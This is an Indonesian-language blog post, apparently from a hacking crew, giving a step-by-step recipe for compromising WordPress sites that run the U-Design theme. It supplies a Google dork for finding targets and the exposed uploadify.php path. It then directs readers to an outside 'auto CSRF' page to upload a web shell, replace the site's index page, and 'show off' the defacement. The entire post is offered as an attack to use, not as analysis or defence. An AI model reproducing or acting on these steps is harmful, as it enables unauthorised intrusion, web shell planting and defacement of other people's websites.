Dork:inurl:/wp-content/themes/u-design/sliders/intext"kids"
Kembangin Sendiri "Gunakan Pikiran Kamu"
Exploit:/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
Vuln= Blank / KOSONG
Csrf online : http://dukujuk.idwebs.info/autocsrf.php
STEP:
1.Dorkin.
Contoh:gct.com
2.Tambahkan Exploit Di Belakangnya.
Contoh :gct.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
3.Jika Vuln Maka Akan Jadi Blank/Kosong
4.Setelah itu Kalian Masukan Ke Auto CSRF
Di Atas
5.Setelah Itu Masukan Site Yang Vuln Tadi Contoh:gct.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
Dan Bagian Bawah FileData
6.Jika Berhasil Kalian Akan Di Suruh
Mengupload Shell
7.Jika Berhasil Maka Akan Muncul Angka "1"
Selain Angka Satu Tidak Bisa
8. Setelah Muncul Angka "1" Kamu Hapus Exploit Yang Tadi Lalu Ganti Shell Kamu
Contoh : gct.com/yourshell.phtml
9.Tebas Index
10. Shoow off Deh
Thanks To :Mr. Face Gagak Cyber Team
Tidak ada komentar:
Posting Komentar